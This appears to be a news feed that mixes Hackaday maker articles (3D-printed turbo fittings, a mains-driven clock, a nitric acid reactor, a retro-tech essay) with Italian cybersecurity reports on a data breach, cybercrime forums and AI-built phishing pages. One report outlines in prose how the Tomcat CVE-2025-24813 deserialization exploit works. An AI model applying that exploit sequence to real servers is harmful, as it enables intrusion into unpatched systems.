3D Printer Turbo-Charges a Vintage Vehicle
[Ryan] of [Fat Lip Collective] has been on a streak of using 3D printing for his car mod projects. From spark plug adapters to exhaust pipes to dash panels, his CAD skills and additive manufacturing tech have played a number of roles in his process.
Most recently, [Ryan] has embarked on a mission to equip an ’80s-era Toyota KE70 Corolla with a turbo engine. The main question there being how to fit the engine back into the car once he’s inserted a salvaged turbo into the exhaust line.
There is a non-trivial amount of stuff that needs to be packed in with the rest of the engine and finding a working configuration that doesn’t get in the way of anything else requires some trial and error. Furthermore, the alignment of the many twisting and turning pieces of schedule 40 pipe that will direct gasses where they need to go needs to be pretty precise.
Juggling all of this would be tedious, time consuming, and error prone if it were not for [Ryan’s] mighty 3D printer. He printed a set of the different elbows and reducers modeled on the schedule 40 pipe that he would likely be using. He added degree markers for easy reference later and flat sections at the ends of each piece so they could be bolted to each other. With this kit of parts in hand, he was able to mock up different arrangements, re-configuring them as he considered the position of other nearby components.
youtube.com/embed/XHWLxWQFZ_k?…
The project is still ongoing. but we’re looking forward to seeing [Ryan] roaring around in his souped-up Corolla soon. In the meantime you can go deeper on ways of adding turbo to vehicles from the ’90s, the innovation of the Mercedes Formula 1 split turbo engine, and see the evolution of a 3D-printed pulsejet turbocharger.
Thanks to [Ryan Ralph] (not the same Ryan) for tipping us off.
2025 One Hertz Challenge: Electromechanical CMOS Clock Keeps In Step With Mains Frequency
Some people can’t be bothered to read the analog face of a traditional clock. Some people cannot stand the low frequency “hum” of mains current. If you are in either of those categories, you probably don’t want to make [Christian]’s handsome and well-documented electromechanical CMOS clock.
As you might guess from the name, the clock uses CMOS logic, based around a 12 bit counter, to provide the divider circuits 24 (daily) and 60 (minutes and seconds). Specifically, the circuits are based around a CD4040 twelve-bit adder. Those signals go through DAC circuits based around DAC0808 chips to drive some very nice coil meters for hours and minutes in lieu of the traditional clock face. Taking the time to make a CMOS clock circuit from adder chips is respectable enough in this era of instant-gratification through micro-controllers, and we dig the blinkenlights built into the circuits, but it’s what is being added that is where things get really interesting.
[Christian] had the bright idea that a stepper motor could be driven via the mains, simply by using a capacitor to offset the waveforms on the coils by 90 degrees. With a 200-step stepper motor, [Christian] gets one revolution per second out of the 50 Hz grid; this generates the seconds signal for his CMOS chips by the simple expedient of a 3D printed arm and a light barrier. Once per second, the light is interrupted by the spinning arm, creating a pulse for the clock circuits to add up. Check it out in action in the demo video below.
This project also seems to have the distinction of being the first project submitted to our One Hertz Challenge. It’s not just for clocks, but keep an eye on your clock because entries are only open until 9:00 AM Pacific time on August 19th.
youtube.com/embed/5NQqowjCvls?…
Hackaday Podcast Episode 327: A Ploopy Knob, Rube-Goldberg Book Scanner, Hard Drives and Power Grids Oscillating Out of Control
It’s Independence Day here in the USA, but if you’re not a fan of fireworks and hot dogs, Elliot and Dan’s rundown of the best hacks of the week is certainly something to celebrate. Rest easy, because nothing exploded, not even the pneumatic standing desk that [Matthias] tore into, nor the electroplated 3D prints that [H3NDRIK] took a blowtorch to. We both really loved the Ploopiest knob you’ve ever seen, which would be even Ploopier in anodized aluminum, as well as an automatic book scanner that takes its job very seriously. We looked into the mysteries of the Smith chart, another couple of fantastic student projects out of Cornell, the pros and cons of service loops, and what happened when the lights went out in Spain last Spring. And what does Janet Jackson have against laptops anyway?
html5-player.libsyn.com/embed/…
Where to Follow Hackaday Podcast
Places to follow Hackaday podcasts:
Download this entirely innocent-looking MP3.
Episode 327 Show Notes:
News:
- Supercon CFP Extended
- Announcing The 2025 Hackaday One Hertz Challenge
What’s that Sound?
- Fill out this form for your chance to win!
Interesting Hacks of the Week:
- Open-Source Knob Packed With Precision
- Standing Desk Uses Pneumatics To Do The Job
- Data Visualization And Aggregation: Time Series Databases, Grafana And More
- Howto: Docker, Databases, And Dashboards To Deal With Your Data
- VictoriaMetrics: Simple & Reliable Monitoring for Everyone
- A Scanner For Arduino-Powered Book Archiving
- Audio Localization Gear Built On The Cheap
- Meet Cucumber, The Robot Dog
- Blowtorching Electroplated 3D Prints For Good Reason
Quick Hacks:
- Elliot’s Picks
- Turbine Blower 3D Prints Every Part, Including Triple Planetary Gears
- Windows 95 On PlayStation 2 Works As Well As You Expected
- Phone Keyboard Reverse Engineered
- Dan’s Picks:
- Pi Networks The Smith Chart Way
- Are Service Loops A Good Idea?
- Move Over, Cybertruck: Series Hybrids From Edison Are On The Way
Can’t-Miss Articles:
- One Laptop Manufacturer Had To Stop Janet Jackson Crashing Laptops
- The 2025 Iberian Peninsula Blackout: From Solar Wobbles To Cascade Failures
hackaday.com/2025/07/04/hackad…
Smart Temp Sensors Helps You Nail Your Cooking
Cooking is all about temperature control: too cold isn’t good enough, and too hot can ruin everything. To aid in this regard, [Printerforge] created a smart temperature alarm to keep them aware of exactly what’s going on in the pot.
The device is simple — it uses an Arduino Nano hooked up to a thermistor to measure the temperature of fluid in a pot. The microcontroller displays the current temperature and the target temperature on a simple 16×2 character LCD. Upon the fluid reaching the target temperature, the alarm is sounded, indicating that the cooking has reached a given stage or must otherwise be seen to. The whole build is wrapped up in a simple 3D printed case, along with a lithium-ion cell with charging managed via a TP4056 module.
If you’re regularly letting your pasta overcook or your stews burn in the pot, this kind of tool could be useful for you. Similarly, if you’ve ever wanted to pursue the 64-degree egg, this could be a way to do it. The trick is to make sure you build it safely—ensuring that any parts that come into contact with the food are rated as food safe for your given application.
If this build has you contemplating the possibilities of machine-assisted cooking, you might like to go even further. How about getting involved in the world of sous vide? Meanwhile, if you’ve got any kitchen hacks of your own, don’t hesitate to let us know on the tipsline!
Vulnerabilità critiche in Apache Tomcat e Apache Camel vengono sfruttate attivamente
Dai primi mesi del 2025, gli esperti di sicurezza hanno registrato un aumento esponenziale degli attacchi informatici a livello globale, con oltre 125.000 tentativi di sfruttamento in più di 70 paesi, riguardanti le vulnerabilità di Apache Tomcat e Apache Camel. Queste falle di sicurezza, identificate come CVE-2025-24813 per Apache Tomcat e CVE-2025-27636 e CVE-2025-29891 per Apache Camel, permettono l’esecuzione remota di codice, configurandosi come minacce considerevoli per le organizzazioni che impiegano queste piattaforme Java di ampio utilizzo.
A partire dalla loro divulgazione, avvenuta nel marzo 2025, i malintenzionati hanno cominciato ad approfittare delle debolezze critiche presenti in queste soluzioni, mettendo a rischio la sicurezza delle imprese che le adottano. I ricercatori di Palo Alto Networks hanno individuato un drammatico aumento dei tentativi di sfruttamento subito dopo la divulgazione pubblica delle vulnerabilità, con un picco di frequenza degli attacchi.
I sistemi di telemetria dell’azienda di sicurezza hanno bloccato 125.856 sonde, scansioni e tentativi di exploit, di cui 7.859 specificamente mirati alla vulnerabilità di Tomcat. Apache Tomcat, la popolare piattaforma di server web che consente applicazioni web basate su Java, è vulnerabile tramite CVE-2025-24813, che colpisce le versioni da 9.0.0.M1 a 9.0.98, da 10.1.0-M1 a 10.1.34 e da 11.0.0-M1 a 11.0.2. La falla sfrutta la funzionalità PUT parziale di Tomcat combinata con le caratteristiche di persistenza della sessione, consentendo agli aggressori di manipolare i file di sessione serializzati e di ottenere l’esecuzione di codice arbitrario .
Apache Camel, un framework di integrazione per la connessione di sistemi diversi, soffre di due vulnerabilità correlate che consentono agli aggressori di aggirare i meccanismi di filtraggio delle intestazioni tramite tecniche di manipolazione con distinzione tra maiuscole e minuscole.
Due fasi dell’exploit (Fonte – Palo Alto Networks)
L’analisi dei modelli di attacco rivela sia strumenti di scansione automatizzati sia tentativi di sfruttamento attivi, con molti attacchi che sfruttano il framework Nuclei Scanner disponibile gratuitamente. Il panorama delle minacce si è evoluto rapidamente dalle prime divulgazioni, con exploit proof-of-concept diventati pubblici subito dopo il rilascio delle patch di sicurezza da parte di Apache.
La facilità di sfruttamento ha abbassato la barriera per gli autori delle minacce meno sofisticati, rendendo queste vulnerabilità particolarmente pericolose per le organizzazioni che non hanno applicato gli aggiornamenti necessari. La vulnerabilità CVE-2025-24813 sfrutta un sofisticato processo di attacco in due fasi che sfrutta la gestione da parte di Tomcat delle richieste PUT parziali con intestazioni Content-Range.
La distribuzione iniziale del payload richiede configurazioni server specifiche, tra cui un parametro di sola lettura disabilitato e la persistenza della sessione abilitata. Quando queste condizioni sono soddisfatte, Tomcat salva il codice serializzato dell’aggressore in due posizioni: un normale file di cache nella directory webapps e un file temporaneo con un punto iniziale nella directory di lavoro. Il processo di sfruttamento si conclude quando l’aggressore invia una richiesta HTTP GET di follow-up contenente un valore cookie JSESSIONID accuratamente creato che innesca la deserializzazione del codice dannoso memorizzato nella cache.
L'articolo Vulnerabilità critiche in Apache Tomcat e Apache Camel vengono sfruttate attivamente proviene da il blog della sicurezza informatica.
Why GitHub Copilot Isn’t Your Coding Partner
These days ‘AI’ is everywhere, including in software development. Coming hot on the heels of approaches like eXtreme Programming and Pair Programming, there’s now a new kind of pair programming in town in the form of an LLM that’s been digesting millions of lines of code. Purportedly designed to help developers program faster and more efficiently, these ‘AI programming assistants’ have primarily led to heated debate and some interesting studies.
In the case of [Jj], their undiluted feelings towards programming assistants like GitHub Copilot burn as brightly as the fire of a thousand Suns, and not a happy kind of fire.
Whether it’s Copilot or ChatGPT or some other chatbot that may or may not be integrated into your IDE, the frustration with what often feels like StackOverflow-powered-autocomplete is something that many of us can likely sympathize with. Although [Jj] lists a few positives of using an LLM trained on codebases and documentation, their overall view is that using Copilot degrades a programmer, mostly because of how it takes critical thinking skills out of the loop.
Regardless of whether you agree with [Jj] or not, the research so far on using LLMs with software development and other tasks strongly suggests that they’re not a net positive for one’s mental faculties. It’s also important to note that at the end of the day it’s still you, the fleshy bag of mostly salty water, who has to justify the code during code review and when something catches on fire in production. Your ‘copilot’ meanwhile gets off easy.
SMD Capacitor Doubles as Cheap SD Card Latch
Here’s a clever hack. Simple, elegant, and eminently cost-effective: using an SMD capacitor to hold your flash media in place!
This is a hack that can pretty much be summed up with just the image at the top of the page — a carefully placed SMD capacitor soldered to a routed tab makes for an extremely cost effective locking mechanism for the nearby SD card slot. There’s just enough flexibility to easily move the capacitor when its time to insert or eject your media.
It’s worth noting that the capacitor in this example doesn’t even appear to be electrically connected to anything. But there’s also no reason you couldn’t position one of the capacitors in your existing bill of materials (BOM). This form of mechanical support will be much cheaper than special purpose clips or mounts. Not a big deal for low-volume projects, but if you’re going high-volume this is definitely something to keep in mind.
If you’re just getting started with SMD capacitors then one of the first things to learn is how to solder them. Also, if you’re hoping to salvage them then try to look for newer equipment which is more likely to have SMD components than through-hole. If you’re planning to use your capacitors for… “capacitance” (how quaint), you can start by learning the basics. And if you want to know everything you can learn about the history of capacitors, too.
Thanks to [JohnU] for writing in to let us know about this one. Have your own natty hacks? Let us know on the tipsline!
DarkForums prende il controllo del canale Telegram “The Jacuzzi” gestito da BreachForums
Il panorama underground dei forum cybercriminali continua a evolversi e sta cambiando. Con un annuncio ufficiale pubblicato il 25 giugno 2025 sia su Telegram sia all’interno del forum DarkForums, l’utente Knox – attuale amministratore e figura apicale della piattaforma – ha comunicato il passaggio di controllo del canale Telegram “The Jacuzzi”, noto anche come baphchat, sotto l’egida di DarkForums.
Questa mossa rappresenta l’ennesimo tassello nella lenta ma inesorabile disgregazione dell’ecosistema lasciato vacante da BreachForums, a seguito degli eventi legali che ne hanno segnato la chiusura nel 2023 e la successiva instabilità nel 2024. Il canale “The Jacuzzi” era stato originariamente concepito come spazio non ufficiale per la community di BreachForums, in cui operatori, venditori e attori del cybercrime potevano interagire informalmente al di fuori delle rigidità della piattaforma principale.
Dal declino di BreachForums alla riconfigurazione di DarkForums
BreachForums successore spirituale del celebre RaidForums– aveva consolidato nel tempo una struttura centralizzata incentrata sullo scambio di database violati, dati personali (PII) e credenziali, finché l’arresto del suo amministratore “pompompurin” nel marzo 2023 non ha segnato un punto di non ritorno. Nonostante vari tentativi di rilancio da parte di attori come Baphomet e altri fork della community, il progetto non è mai più tornato alla stabilità iniziale.
In questo vuoto, DarkForums ha saputo giocare un ruolo strategico, acquisendo credibilità e utenza attraverso un’offerta simile in termini di contenuti (accessi RDP, combolist, leak, strumenti di malware development) ma con una governance meno esposta. Con il takeover di “The Jacuzzi”, DarkForums non si limita a incorporare un canale: consolida un’infrastruttura di comunicazione e reputazione precedentemente associata al marchio BreachForums.
Riferimenti ufficiali e implicazioni operative
Nel messaggio pubblicato sul forum, l’amministratore Knox scrive:
“The ‘Jacuzzi’ Telegram chat which was previously the Breachforums official chatroom is now owned by us, and from now this will be the official DarkForums chat.”
Contestualmente, sono stati resi disponibili i seguenti riferimenti:
- Forum Thread
- Telegram ufficiale
- Mirror e alternative d’accesso
L’iniziativa rafforza anche l’ecosistema di comunicazione out-of-band tipico dei forum criminali moderni, dove i canali Telegram agiscono da fallback in caso di downtime, sequestro o problemi di reputazione dei domini principali. La scelta di consolidare “The Jacuzzi” come ambiente affiliato ufficiale consente a DarkForums di presidiare attivamente l’engagement della community, attrarre ex utenti di BreachForums e legittimarsi come hub alternativo.
Conclusioni e analisi CTI
Dal punto di vista della Cyber Threat Intelligence, questo cambiamento rappresenta un ulteriore ricombinarsi delle dinamiche di leadership nei marketplace di dati illeciti. Il mantenimento di riferimenti Telegram attivi, ora sotto nuova gestione, costituisce un importante indicatore di persistenza delle attività legate alla criminalità informatica, pur in contesti di discontinuità strutturale.
Organizzazioni che monitorano le attività su canali OSINT/CLOSINT dovrebbero aggiornare i loro modelli di tracciamento, includendo questo nuovo asset di DarkForums come fonte attiva per potenziali early warning, comunicazioni interne alla threat actor economy e promozione di nuovi dump o servizi illeciti.
L'articolo DarkForums prende il controllo del canale Telegram “The Jacuzzi” gestito da BreachForums proviene da il blog della sicurezza informatica.
Pez Blaster Shoots Candy Dangerously Fast
You could use a little pocket-sized Pez dispenser if you’re a humble, reserved person. Or, you could follow the example of [Backhaul Studios], and build a dangerously powerful blaster that shoots Pez fast enough to shatter them into pieces. Just don’t aim it at your own mouth.
As the video explains, Pez is really the perfect candy for this application. It’s compact, hard, and already designed to be dispensed via a magazine. It’s thus not a big stretch to set it up to be fired out of a pistol-like blaster. The build is of the flywheel type, where a pair of counter-rotating wheels fling the candy out at great speed. The wheels themselves are spun up to high speed with a pair of small brushless motors, running off hobby speed controllers and lithium-ion batteries. A simple trigger mechanism dispenses the rectangular candies into the wheel mechanism, sending them flying out of the blaster at will. It’s all 3D-printed, designed specifically for the purpose of high-speed candy delivery.
The video goes into great detail on the design, from the development of the TPU treads on the flywheels and other details that helped improve the effectiveness of the design. The final build shoots Pez fast enough that they practically detonate upon hitting a surface.
We’ve featured some innovative work in this space from [Backhaul Studios] before—the condiment cannon was really quite something. Video after the break.
youtube.com/embed/wibRAZ_pmeY?…
AI Might Kill Us All (With Carbon Emissions)
So-called artificial intelligence (AI) is all the rage right now between your grandma asking ChatGPT how to code in Python or influencers making videos without having to hire extras, but one growing concern is where the power is going to come from for the data centers. The MIT Technology Review team did a deep dive on what the current situation is and whether AI is going to kill us all (with carbon emissions).
Probably of most interest to you, dear hacker, is how they came up with their numbers. With no agreed upon methods and different companies doing different types of processing there were a number of assumptions baked into their estimates. Given the lack of information for closed-source models, Open Source models were used as the benchmark for energy usage and extrapolated for the industry as a whole. Unsurprisingly, larger models have a larger energy usage footprint.
While data center power usage remained roughly the same from 2005 to 2017 as increases in efficiency offset the increase in online services, data centers doubled their energy consumption by 2023 from those earlier numbers. The power running into those data centers is 48% more carbon intensive than the US average already, and expected to rise as new data centers push for increased fossil fuel usage, like Meta in Louisiana or the X data center found to be using methane generators in violation of the Clean Air Act.
Technology Review did find “researchers estimate that if data centers cut their electricity use by roughly half for just a few hours during the year, it will allow utilities to handle some additional 76 gigawatts of new demand.” This would mean either reallocating requests to servers in other geographic regions or just slowing down responses for the 80-90 hours a year when the grid is at its highest loads.
If you’re interested in just where a lot of the US-based data centers are, check out this map from NREL. Still not sure how these LLMs even work? Here’s an explainer for you.
Smart Mjolnir Makes Questionable Judgement Call On Your Worthiness
Mjolnir, also known as Thor’s hammer, is a discerning thing, at least if you believe the modern Marvel canon. [alemanjir] decided to build a semi-functional replica that makes judgement calls of its own, though they’re perhaps a little less thought-out than the storied hammer of legend.
The build consists of a 3D-printed hammer prop, inside of which is a Raspberry Pi Pico microcontroller running the show. It’s hooked up to a MPR121 touch sensor that detects when someone grips the handle of the hammer. At this point, the Pico makes a pseudorandom “worthiness check” as to whether the holder is righteous enough to wield the hammer. If they are pure of heart, it unlocks a magnet which frees the hammer from whatever metallic surface it might be stuck to. [alemanjir] also included a little additional functionality, with the hammer playing various sounds when swung thanks to a speaker and a ADXL345 accelerometer secreted inside.
One wonders whether the electromagnet inside is strong enough to hold out against an unworthy person lifting it from the ground. While it’s perhaps not as powerful or as decisive as the mythical object, it’s nonetheless a fun learning project that likely taught [alemanja] some useful basics of embedded development.
We’ve featured some terrifying takes of the Mjolnir prop before, too, like this shockingly high voltage version. Video after the break.
youtube.com/embed/zJyJTZsgy5M?…
A Miniature Ostwald Reactor to Make Nitric Acid
Modern fertilizer manufacturing uses the Haber-Bosch and Ostwald processes to fix aerial nitrogen as ammonia, then oxidize the ammonia to nitric acid. Having already created a Haber-Bosch reactor for ammonia production, [Markus Bindhammer] took the obvious next step and created an Ostwald reactor to make nitric acid.
[Markus]’s first step was to build a sturdy frame for his apparatus, since most inexpensive lab stands are light and tip over easily – not a good trait in the best of times, but particularly undesirable when working with nitrogen dioxide and nitric acid. Instead, [Markus] built a frame out of aluminium extrusion, T-nuts, threaded rods, pipe clamps, and a few cut pieces of aluminium.
Once the frame was built, [Markus] mounted a section of quartz glass tubing above a gas burner intended for camping, and connected the output of the quartz tube to a gas washing bottle. The high-temperature resistant quartz tube held a mixture of alumina and platinum wool (as we’ve seen him use before), which acted as a catalyst for the oxidation of ammonia. The input to the tube was connected to a container of ammonia solution, and the output of the gas washing bottle fed into a solution of universal pH indicator. A vacuum ejector pulled a mixture of air and ammonia vapors through the whole system, and a copper wool flashback arrestor kept that mixture from having explosive side reactions.
After [Markus] started up the ejector and lit the burner, it still took a few hours of experimentation to get the conditions right. The issue seems to be that even with catalysis, ammonia won’t oxidize to nitrogen oxides at too low a temperature, and nitrogen oxides break down to nitrogen and oxygen at too high a temperature. Eventually, though, he managed to get the flow rate right and was rewarded with the tell-tale brown fumes of nitrogen dioxide in the gas washing bottle. The universal indicator also turned red, further confirming that he had made nitric acid.
Thanks to the platinum catalyst, this reactor does have the advantage of not relying on high voltages to make nitric acid. Of course, you’ll still need get ammonia somehow.
youtube.com/embed/IGHNvnsykxQ?…
OpenMIDIStomper Makes Sure Your Gear Does What Your Foot Says
If you’re a solo musician, you probably have lots of gear you’d like to control, but you don’t have enough hands. You can enlist your feet, but your gear might not have foot-suitable interfaces as standard. For situations like these, [Nerd Musician] created the OpenMIDIStomper.
The concept is simple enough—the hardy Hammond enclosure contains a bunch of foot switches and ports for external expression pedals. These are all read by an Arduino Pro Micro, which is responsible for turning these inputs into distinct MIDI outputs to control outboard gear or software. It handles this via MIDI over USB. The MIDI commands sent for each button can be configured via a webpage. Once you’ve defined all the messages you want to send, you can export your configuration from the webpage by cutting and pasting it into the Arduino IDE and flashing it to the device itself.
We’ve featured some great MIDI controllers over the years, like this impressive parts bin build.
youtube.com/embed/yELnZdEJqS0?…
Last Chance: 2025 Hackaday Supercon Still Wants You!
Good news, procrastinators! Today was going to be the last day to throw your hat in the ring for a slot to talk at Supercon in November, but we’re extending the deadline one more week, until July 10th. We have an almost full schedule, but we’re still missing your talk.
So if the thought of having missed the deadline fills you with regret, here’s your second chance. We have spots for both 40-minute and 20-minute talks still open. We love to have a mix of newcomers as well as longtime Hackaday friends, so don’t be shy.
Supercon is a super fun time, and the crowd is full of energy and excitement for projects of all kinds. There is no better audience to present your feats of hardware derring-do, stories of reverse engineering, or other plans for world domination. Where else will you find such a density of like-minded hackers?
Don’t delay, get your talk proposal in today.
I Gotta Print More Cowbell
Since the earliest days of affordable, home 3D printers, the technology behind them has been continuously improving. From lowering costs, improving print quality, increasing size and detail, and diversifying the types of materials, it’s possible to get just about anything from a 3D printer today with a minimum of cost. Some of the things that printers can do now might even be surprising, like this upgrade that makes [Startup Chuck]’s 3D printer capable of printing realistic-sounding cowbells out of plastic.
The key to these metal-like prints is a filament called PPS-CF which is a carbon fiber-reinforced polyphenylene sulfide, or PPS. PPS-CF has a number of advantages over other plastics including high temperature tolerance and high dimensional stability, meaning its less likely to warp or deform even in harsh environments. But like anything with amazing upsides, there are some caveats to using this material. Not only does the carbon fiber require more durable extruder nozzles but PPS-CF also needs an extremely hot print head to extrude properly in addition to needing a heated bed. In [Startup Chuck]’s specific case he modified his print head to handle temperatures of 500°C and his print bed to around 100°C. This took a good bit of work just to supply it with enough energy to get to these temperatures and caused some other problems as well, like the magnet on the printer bed demagnetizing above around 75°C.
To get to a working cowbell took more than just printer upgrades, though. He had to go through a number of calibrations and test prints to dial in not only the ideal temperature settings of the printer but the best thicknesses for the cowbell itself so it would have that distinct metallic ring. But cowbells aren’t the only reason someone might want to print with carbon-reinforced materials. They have plenty of uses for automotive, chemical processing, high voltage, and aerospace applications and are attainable for home 3D printers. Just make sure to take some basic safety precautions first.
youtube.com/embed/iDTNg8wi9xA?…
Back to the Future, 40 Years Old, Looks Like the Past
Great Scott! If my calculations are correct, when this baby hits 88 miles per hour, you’re gonna see some serious shit. — Doc Brown
On this day, forty years ago, July 3rd, 1985 the movie Back to the Future was released. While not as fundamental as Hackers or realistic as Sneakers, this movie worked its way into our pantheon. We thought it would be appropriate to commemorate this element of hacker culture on this day, its forty year anniversary.
If you just never got around to watching it, or if it has been a few decades since you did, then you might not recall that the movie is set in two periods. It opens in 1985 and then goes back to 1955. Most of the movie is set in 1955 with Marty trying to get back to 1985 — “back to the future”. The movie celebrates the advanced technology and fashions of 1985 and is all about how silly the technology and fashions of 1955 are as compared with the advancements of 1985. But now it’s the far future, the year 2025, and we thought we might take a look at some of the technology that was enchanting in 1985 but that turned out to be obsolete in “the future”, forty years on.
As the opening credits roll there are a bunch of different ticking clocks, signaling the time motif. But they are all analog clocks, some with pendulums, and not an LED or 7-segment display in sight. The only “digital” clock is a split-flap. The signaling of the time motif by clocks is done throughout the film, from the control panel in Doc’s DeLorean time-machine to the stopped clock on the town hall. Of course these days clocks have gotten much better and now they can even set themselves.
The JVC hand-held video camera recorded to VHS tape. The competing format to VHS at the time was known as Betamax which was developed by Sony. You will of course still find hand-held video cameras today but these days they are far more capable such as with 8K video cameras and you probably have one as a feature of your smartphone anyway. The tape-based VHS and Betamax media has been made obsolete mostly by flash media.
The old Cathode Ray Tube (CRT) television gave way to flat-screen LCD displays and nowadays transparent OLED is state of the art. There were two competing video standards back in 1985 being NTSC which was used in North America, Japan, parts of South America, and so on; and PAL which was used in Europe, Australia, parts of Asia, and Africa.
These old standards didn’t accommodate more than 30 frames-per-second, NTSC was 29.97 Hz and PAL was 25 Hz; and long before “widescreen” 16:9 aspect ratios were released in the 90s they had resolutions of up to 720 × 480 for NTSC and 720 × 576 for PAL. That’s “up to”, there were versions with resolutions worse than this. Of course this is a long way from the 4K@60Hz you have become accustomed to! Also there were no remote controls for these old beasts, you had to get up out of your chair to adjust the volume or change the channel, oh the indignity of it all!
When Marty McFly rocks out, he plugs his guitar into a vacuum tube amplifier, a piece of gear that has proven to have surprisingly long legs. You would think that it would now be an anachronism, replaced by transistor technology, but many guitarists still think that analog vacuum tube technology has a superior and warmer distortion sound. Powering the amp is another dinosaur that survived. The Variac controller shown is an autotransformer that is still made and used, although in 1985 the Variac trademark was owned by General Radio but is now owned by ISE, Inc.
The Cathode-Ray Oscilloscope (CRO) on the table there is completely obsolete, but it remains customary for a hacker to get nostalgic and buy one on eBay. The analog Voltage-Ohm-Milliamp (VOM) meter is maybe only half obsolete, and as with the CRO, a nostalgic hacker will still have one. Everyone else has a Digital Multi-Meter (DMM) which can do everything a VOM could do, and much more.
The old reel-to-reel magnetic tape recorder and player gave way to miniature flash storage in the end. And also a bunch of other media formats in the interim, ranging from floppy-disks to hard-drives. Reel-to-reel magnetic tech had a number of drawbacks, not least was that rewinding and fast-forwarding to find the track you were looking for was a real hassle. (Should we say a reel hassle?) Also the signal would get weaker and more distorted the more copies were made, this was known as generation loss and isn’t relevant to digital media.
The pulse-dial telephone gave way first to DTMF-based phones and then ultimately to cellphones and Voice over IP. People who are too young to have seen or used a rotary-dial phone won’t know how slow and annoying they were to use. To key in a number you had to rotate the dial in proportion to the number you wanted to enter, one for one, two for two, up to nine for nine and ten for zero; so if you had larger numbers in the phone number you were keying in you would have to wait for the dial to count back, which was tedious and boring. It is certainly not for practicality reasons that hackers keep trying to bring them back.
Like the pulse-dial and DTMF-based landline telephones the cordless telephone also gave way to cellphones and VoIP, but the old cordless telephones get a special mention because they were totally insecure. The radio signals they used were easily sniffed by anyone who knew how to operate a radio. To patch this technical vulnerability, the FCC made listening to particular frequencies illegal, and manufacturers cut out the cellphone and wireless phone bands from their scanners.
And to wrap-up let’s give a special mention to the push-button Seeburg vinyl jukebox. These were commonplace back in the day and every good bar had a coin-operated one. These days you’re unlikely to find a jukebox at the bar, it is perhaps more likely that one of the bar staff is streaming music to the bar’s Bluetooth speakers from their smartphone.
Thanks for coming with us on this brief journey back to 1985, it was fun to take some time to look at some of the things that have changed, and to pay our respects to this icon of hacker culture on its fortieth birthday. Don’t forget to sound-off in the comments regarding where you have seen references to the movie!
Da AI white ad AI black il passo è breve. Nuovi strumenti per Script Kiddies bussano alle porte
I ricercatori di Okta hanno notato che aggressori sconosciuti stanno utilizzando lo strumento di intelligenza artificiale generativa v0 di Vercel per creare pagine false che imitano quelle reali. V0 è uno strumento che consente agli utenti di creare landing page di base e app complete utilizzando solo prompt di testo. Ora, i ricercatori hanno scoperto che questa funzionalità viene sfruttata in modo improprio dagli aggressori per creare repliche convincenti delle pagine di accesso di diversi marchi noti (tra cui un cliente Okta di cui non è stato reso noto il nome).
È stato inoltre scoperto che gli aggressori hanno inserito altre risorse sull’infrastruttura di Vercel, inclusi falsi loghi aziendali. Si presume che gli hacker stessero abusando della piattaforma nel tentativo di eludere il rilevamento.
Vercel ha ora bloccato l’accesso alle pagine di phishing rilevate.
Gli esperti sottolineano che, a differenza dei tradizionali kit di phishing (la cui configurazione richiede una certa conoscenza e impegno), v0 e strumenti open source simili, disponibili gratuitamente su GitHub, consentono agli aggressori di creare pagine false semplicemente digitando un messaggio di testo. Questo velocizza il processo e non richiede alcuna programmazione, aiutando anche i truffatori meno esperti a creare rapidamente siti di phishing convincenti.
“L’attività che abbiamo scoperto conferma che i moderni autori di minacce stanno sperimentando attivamente strumenti di intelligenza artificiale generativa, utilizzandoli come armi per ottimizzare e migliorare le proprie capacità di phishing”, hanno scritto i ricercatori. “Sfruttare una piattaforma come v0.dev di Vercel consente agli autori di minacce di creare rapidamente pagine di phishing ingannevoli e di alta qualità, aumentando la velocità e la portata delle loro operazioni”.
Vale la pena notare che la scorsa settimana anche gli esperti di Cisco hanno scritto della popolarità dell’IA tra i criminali . Secondo loro, gli aggressori stanno utilizzando sempre più modelli linguistici di grandi dimensioni (LLM) per le loro attività, creando versioni speciali non censurate a tale scopo.
Uno di questi LLM che ha guadagnato popolarità tra i criminali informatici è WhiteRabbitNeo, pubblicizzato come un “modello di intelligenza artificiale non censurata per i team (Dev)SecOps” e presumibilmente utilizzabile sia nella sicurezza informatica offensiva che difensiva. Cisco sottolinea che questo LLM contribuisce alla creazione di strumenti di hacking offensivi, email di phishing e altro ancora.
Gli hacker hanno anche sviluppato i propri LLM senza restrizioni, che ora vengono venduti ad altri criminali informatici. Tra questi LLM, il rapporto elenca: WormGPT , FraudGPT , GhostGPT, DarkGPT e DarkestGPT.
I creatori di tali modelli pubblicizzano i loro prodotti, promettendo che aiuteranno a scrivere codice dannoso, creare malware “invisibili”, pagine e-mail di phishing, strumenti di hacking, cercare vulnerabilità e fughe di notizie, offuscamento del codice e molto altro.
L'articolo Da AI white ad AI black il passo è breve. Nuovi strumenti per Script Kiddies bussano alle porte proviene da il blog della sicurezza informatica.
DoValue conferma la violazione con un comunicato stampa
Come già anticipato da Red Hot Cyber, un imponente data breach di 16TB di dati ha colpito doValue S.p.A., una delle principali società italiane ed europee specializzate nei servizi di gestione e recupero crediti. In un comunicato ufficiale pubblicato sul proprio sito, l’azienda ha confermato di essere stata vittima di un attacco informatico e ha avviato indagini interne con il supporto delle autorità competenti e di esperti in cybersecurity.
È importante sottolineare che doValue ha risposto in modo etico e trasparente già il 5 maggio scorso, pubblicando un comunicato ufficiale sull’accaduto prima ancora che i dati venissero resi pubblici nei forum underground. Questo tempismo dimostra una volontà chiara di affrontare l’incidente in modo responsabile, informando tempestivamente stakeholder e autorità. La lunga finestra temporale tra l’attacco e la pubblicazione dei dati da parte dei criminali lascia ipotizzare che sia stata tentata un’attività estorsiva nei confronti dell’azienda, che tuttavia non avrebbe ceduto al ricatto, coerentemente con una linea di condotta ferma e conforme ai principi di legalità e integrità.
Nonostante la complessità e la delicatezza dell’attacco, l’azienda ha immediatamente preso posizione pubblicamente, confermando l’accaduto e avviando una comunicazione trasparente con tutti gli stakeholder. Questa prontezza nella risposta, soprattutto a seguito della messa in vendita dei dati da parte dei cyber criminali, dimostra un atteggiamento responsabile e conforme alle best practice di gestione degli incidenti informatici.
“Il 5 maggio 2025, a seguito di approfondite analisi tecniche, è stato accertato che un incidente di sicurezza ha comportato una violazione di dati personali ai sensi del Regolamento (UE) 2016/679. In particolare, nonostante le misure di sicurezza organizzative e tecniche da noi implementate, le evidenze raccolte indicano che soggetti non autorizzati hanno ottenuto un accesso illecito ad alcuni sistemi informatici della nostra organizzazione e hanno esfiltrato dati presenti nei sistemi da noi usati per lo svolgimento delle attività di gestione e recupero crediti e d’informazioni commerciali. Tale accesso, in ogni caso, è a oggi cessato.”
Il leak: oltre 16 TB di dati e directory interne
